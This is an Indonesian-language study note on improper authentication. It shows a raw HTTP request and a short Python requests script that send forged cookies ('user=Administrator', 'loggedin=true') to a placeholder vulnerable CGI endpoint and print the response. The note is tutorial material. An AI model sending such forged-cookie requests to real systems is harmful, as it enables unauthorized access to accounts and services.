HTTP Request dengan Python

HTTP Request dengan Python

Catatan Belajar oleh : Reza Ervani bin Asmanu

Salah satu vulnerabilitas yang dapat dieksploitasi adalah kelemahan cookies. Misalnya dengan memanipulasi Cookies seperti ini, atau yang dikenal dengan Improper Authentication

GET /cgi-bin/vulnerable.cgi HTTP/1.1
Cookie: user=Administrator
Cookie: loggedin=true

[body of request]

Untuk mengimplementasikan permintaan HTTP seperti yang ada di atas dalam skrip program, Anda dapat menggunakan bahasa pemrograman yang mendukung pengiriman permintaan HTTP, seperti Python. Berikut contoh bagaimana Anda dapat membuat permintaan menggunakan library `requests` dalam Python:

import requests

url = 'http://example.com/cgi-bin/vulnerable.cgi'
headers = {
'Cookie': 'user=Administrator; loggedin=true'
}

response = requests.get(url, headers=headers)

print(response.status_code) # Cetak kode status respons HTTP
print(response.text) # Cetak isi dari respons

Pada contoh ini, kita menggunakan library `requests` untuk membuat permintaan HTTP GET ke URL yang ditentukan (`http://example.com/cgi-bin/vulnerable.cgi`). Kita menyertakan cookie dalam header permintaan menggunakan field `’Cookie’`, dan nilainya diatur sebagai `’user=Administrator; loggedin=true’`. Fungsi `get()` mengirimkan permintaan, dan respons disimpan dalam variabel `response`.

Terakhir, kita dapat mengakses kode status respons menggunakan `response.status_code` dan mencetak isi respons menggunakan `response.text`. Anda dapat memodifikasi kode sesuai dengan kebutuhan khusus, seperti menangani metode HTTP yang berbeda atau mengirimkan body permintaan jika diperlukan.